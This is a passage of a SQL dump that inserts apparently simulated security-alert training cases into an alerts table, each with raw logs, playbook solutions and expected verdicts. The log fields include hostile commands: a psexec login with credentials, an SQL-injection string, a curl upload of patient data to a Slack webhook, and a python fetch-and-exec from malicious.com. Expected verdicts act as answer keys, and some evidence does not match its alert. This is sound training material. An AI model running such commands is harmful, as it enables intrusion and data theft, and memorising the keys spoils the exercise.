cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.248Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"hacker\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.10.20 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.248Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"hacker\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.10.20 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.248Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:23Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.5\\\",\\\"dst_ip\\\":\\\"192.168.10.20\\\",\\\"username\\\":\\\"hacker\\\",\\\"hostname\\\":\\\"compromised-host\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.10.20 -u admin -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1768, 'Suspicious Web Request Detected - Possible SQL Injection', 'medium', 'Firewall', 'A suspicious web request was detected containing patterns indicative of SQL injection targeting a sensitive database endpoint.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:30:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.0.2.100\",\"dst_ip\":\"203.0.113.200\",\"username\":\"webuser\",\"hostname\":\"web-server-01\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"url\":\"/login\"}', '2026-03-15 19:55:37', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP flagged for unusual web requests\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Potential SQL injection pattern\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"Although the request contains SQL patterns, it was a test query by a security team.\"}', 'Expert', 'TI', 9, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1769, 'Anomalous Login Attempt from Foreign IP', 'medium', 'Splunk', 'Multiple failed login attempts were detected from an IP address originating outside the usual geographical location of the user.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:50:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.40\",\"dst_ip\":\"10.10.10.10\",\"username\":\"jdoe\",\"hostname\":\"auth-server\",\"failed_attempts\":12}', '2026-03-15 19:55:37', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP noted for failed login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login attempts were traced back to a legitimate user who was traveling.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.252Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.40\\\",\\\"dst_ip\\\":\\\"10.10.10.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-15T20:57:16.252Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.40\\\",\\\"dst_ip\\\":\\\"10.10.10.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-15T20:56:16.252Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.40\\\",\\\"dst_ip\\\":\\\"10.10.10.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-15T20:55:16.252Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.40\\\",\\\"dst_ip\\\":\\\"10.10.10.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-03-15T20:54:16.252Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.40\\\",\\\"dst_ip\\\":\\\"10.10.10.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"auth-server\\\",\\\"failed_attempts\\\":12}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1770, 'APT41 Spear-Phishing Attempt Detected', 'critical', 'Proofpoint', 'A spear-phishing email from a known APT41-associated domain was detected targeting healthcare employees. The email contained a link to a malicious document hosted on a compromised GitHub repository.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:45:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"45.76.123.84\",\"dst_ip\":\"192.168.1.100\",\"username\":\"jdoe@examplehospital.com\",\"hostname\":\"mailserver01\",\"email_sender\":\"alerts@securelogin-support.com\",\"url\":\"https://github.com/malicious-repo/document\"}', '2026-03-15 19:56:28', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.123.84\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1023 times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://github.com/malicious-repo/document\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting a known malicious document\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"alerts@securelogin-support.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain associated with known phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target mail server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a known malicious IP and contained a link to a GitHub repository hosting a malicious document.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"APT41 Spear-Phishing Attempt Detected\",\"date\":\"2026-03-15T20:58:16.253Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1771, 'Lazarus Group C2 Communication via Slack', 'high', 'Recorded Future', 'Detected C2 communication from an internal server to an external IP associated with Lazarus Group using Slack as a covert channel.', 'Data Exfil', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-03-14T23:30:47Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.55\",\"dst_ip\":\"203.0.113.77\",\"username\":\"svc_backup\",\"hostname\":\"server02\",\"command_line\":\"/bin/bash -c \'curl -X POST -d @/var/log/patient_data.log https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX\'\"}', '2026-03-15 19:56:28', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with Lazarus Group C2 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/bin/bash -c \'curl -X POST -d @/var/log/patient_data.log https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected suspicious data exfiltration command\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised server\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The internal server was compromised and used to exfiltrate data to a known C2 IP using Slack as a channel.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.256Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-14T23:30:47Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.55\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"server02\\\",\\\"command_line\\\":\\\"/bin/bash -c \'curl -X POST -d @/var/log/patient_data.log https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.256Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-14T23:30:47Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.55\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"server02\\\",\\\"command_line\\\":\\\"/bin/bash -c \'curl -X POST -d @/var/log/patient_data.log https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.256Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-14T23:30:47Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.55\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"server02\\\",\\\"command_line\\\":\\\"/bin/bash -c \'curl -X POST -d @/var/log/patient_data.log https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.256Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-14T23:30:47Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.55\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"server02\\\",\\\"command_line\\\":\\\"/bin/bash -c \'curl -X POST -d @/var/log/patient_data.log https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.256Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-14T23:30:47Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.55\\\",\\\"dst_ip\\\":\\\"203.0.113.77\\\",\\\"username\\\":\\\"svc_backup\\\",\\\"hostname\\\":\\\"server02\\\",\\\"command_line\\\":\\\"/bin/bash -c \'curl -X POST -d @/var/log/patient_data.log https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX\'\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1772, 'APT29 Zero-Day Exploit on EHR System', 'critical', 'Anomali', 'A zero-day exploit was used against the Electronic Health Records (EHR) system, leading to unauthorized access to sensitive patient data.', 'Malware', 'T1210', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T05:12:33Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.25\",\"dst_ip\":\"10.0.0.10\",\"username\":\"unknown\",\"hostname\":\"ehr01\",\"command_line\":\"/usr/bin/python -c \'import urllib2; exec(urllib2.urlopen(\\\"http://malicious.com/exploit.py\\\").read())\'\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-03-15 19:56:28', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT29 zero-day exploits\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/python -c \'import urllib2; exec(urllib2.urlopen(\\\"http://malicious.com/exploit.py\\\").read())\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution detected using zero-day exploit\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.3.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised EHR server\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The zero-day exploit was successfully executed, compromising the EHR system and allowing unauthorized access to patient data.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.259Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:12:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.25\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"ehr01\\\",\\\"command_line\\\":\\\"/usr/bin/python -c \'import urllib2; exec(urllib2.urlopen(\\\\\\\"http://malicious.com/exploit.py\\\\\\\").read())\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.259Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:12:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.25\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"ehr01\\\",\\\"command_line\\\":\\\"/usr/bin/python -c \'import urllib2; exec(urllib2.urlopen(\\\\\\\"http://malicious.com/exploit.py\\\\\\\").read())\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.259Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:12:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.25\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"ehr01\\\",\\\"command_line\\\":\\\"/usr/bin/python -c \'import urllib2; exec(urllib2.urlopen(\\\\\\\"http://malicious.com/exploit.py\\\\\\\").read())\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.259Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:12:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.25\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"ehr01\\\",\\\"command_line\\\":\\\"/usr/bin/python -c \'import urllib2; exec(urllib2.urlopen(\\\\\\\"http://malicious.com/exploit.py\\\\\\\").read())\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.259Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:12:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.25\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"ehr01\\\",\\\"command_line\\\":\\\"/usr/bin/python -c \'import urllib2; exec(urllib2.urlopen(\\\\\\\"http://malicious.com/exploit.py\\\\\\\").read())\'\\\",\\\"file_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1773, 'Fancy Bear DGA Domain Communication Detected', 'high', 'MISP', 'Detected DNS requests to a DGA domain associated with Fancy Bear\'s malware infrastructure, indicating possible infection.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:23:56Z\",\"event_type\":\"dns_request\",\"src_ip\":\"10.1.1.50\",\"dst_ip\":\"93.184.216.34\",\"username\":\"svc_user\",\"hostname\":\"client01\",\"domain\":\"xyxqwe123.biz\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-15 19:56:28', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"xyxqwe123.biz\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Domain generated by DGA linked to Fancy Bear\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of infected client machine\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware using DGA for C2 communication\"}}],\"expected_actions\":[\"block_domain\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The DGA domain is linked to Fancy Bear\'s infrastructure, indicating a potential malware infection on the client machine.\"}', 'Expert', 'TI', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.262Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:56Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.1.1.50\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"svc_user\\\",\\\"hostname\\\":\\\"client01\\\",\\\"domain\\\":\\\"xyxqwe123.biz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.262Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:56Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.1.1.50\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"svc_user\\\",\\\"hostname\\\":\\\"client01\\\",\\\"domain\\\":\\\"xyxqwe123.biz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.262Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:56Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.1.1.50\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"svc_user\\\",\\\"hostname\\\":\\\"client01\\\",\\\"domain\\\":\\\"xyxqwe123.biz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.262Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:56Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.1.1.50\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"svc_user\\\",\\\"hostname\\\":\\\"client01\\\",\\\"domain\\\":\\\"xyxqwe123.biz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.262Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:23:56Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.1.1.50\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"svc_user\\\",\\\"hostname\\\":\\\"client01\\\",\\\"domain\\\":\\\"xyxqwe123.biz\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1774, 'Suspicious Login Attempt from Known IP Range', 'medium', 'Wazuh', 'Multiple login failures were detected from an IP range known for benign network scans, potentially triggering a false positive.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:17:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.200\",\"dst_ip\":\"192.168.0.50\",\"username\":\"admin\",\"hostname\":\"gateway01\",\"failed_attempts\":10}', '2026-03-15 19:56:28', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with benign scanning activities; no malicious intent\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted 